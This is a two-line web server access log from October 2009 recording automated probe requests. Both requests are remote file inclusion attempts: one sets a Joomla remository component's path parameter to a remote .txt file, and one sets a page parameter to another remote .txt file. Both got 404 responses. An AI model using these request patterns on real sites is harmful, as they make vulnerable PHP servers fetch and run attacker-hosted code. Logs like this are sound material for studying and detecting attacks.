195.248.63.115 - - [12/Oct/2009:06:34:55 -0400] "GET /logs/access_log.Q109050900//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://maxi-rallye.be/joomla/zipimport/themza_j15_02/html/.../sistem.txt??? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
211.63.60.50 - - [12/Oct/2009:06:35:00 -0400] "GET /logs/access_log.Q109071400%20%20/senetman/html/index.php?page=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/set1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
